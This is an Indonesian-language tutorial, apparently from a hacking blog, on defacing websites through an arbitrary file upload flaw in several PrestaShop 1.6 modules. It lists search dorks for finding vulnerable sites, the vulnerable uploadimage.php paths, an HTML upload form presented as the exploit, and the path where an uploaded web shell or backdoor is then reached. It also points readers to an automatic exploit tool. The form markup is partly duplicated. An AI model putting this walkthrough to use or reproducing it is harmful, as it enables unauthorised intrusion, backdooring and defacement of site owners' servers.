Pada artikel yang satu ini , kami akan menjelaskan tentang " Cara deface website dengan Responsive Prestashop 1.6 Arbitrary File Upload " .
Disini menggunakan dua cara yaitu Manual dan Auto ( tools )Berikut adalah langkah - langkah secara Manual :
#1 Dork :
- inurl:/modules/columnadverts/
- inurl:/modules/homepageadvertise/
- inurl:/modules/productpageadverts/
- inurl:/modules/simpleslideshow/
- inurl:/themes/warehouse/
untuk dork nya silahkan di kembangkan lagi.
#2 Jika Website yang anda pilih dari proses dorking tadi , apabila website tersebut memiliki celah / vuln maka akan muncul tampilan seperti ini :
#3 Apabila terdapat vuln , silahkan gunakan salah satu Exploit dan PoC di bawah ini :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
Exploit Disini:
<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>
<input name="userfile" type="file" /><button>Upload</button>
</form>
#4 Jika upload berhasil , akan muncul tampilan seperti ini :
#5 Selesai ...
Untuk mengakses Shell / backdoor yang telah di upload , silahkan gunakan yang di bawah ini :
Target/modules/modul name/slides/shell.php
Jika anda masih bingung dengan cara manual seperti ini , anda bisa menggunakan Tools di "Auto Exploit Responsive Prestashop 1.6 Arbitrary File Upload "
Semoga Bermanfaat
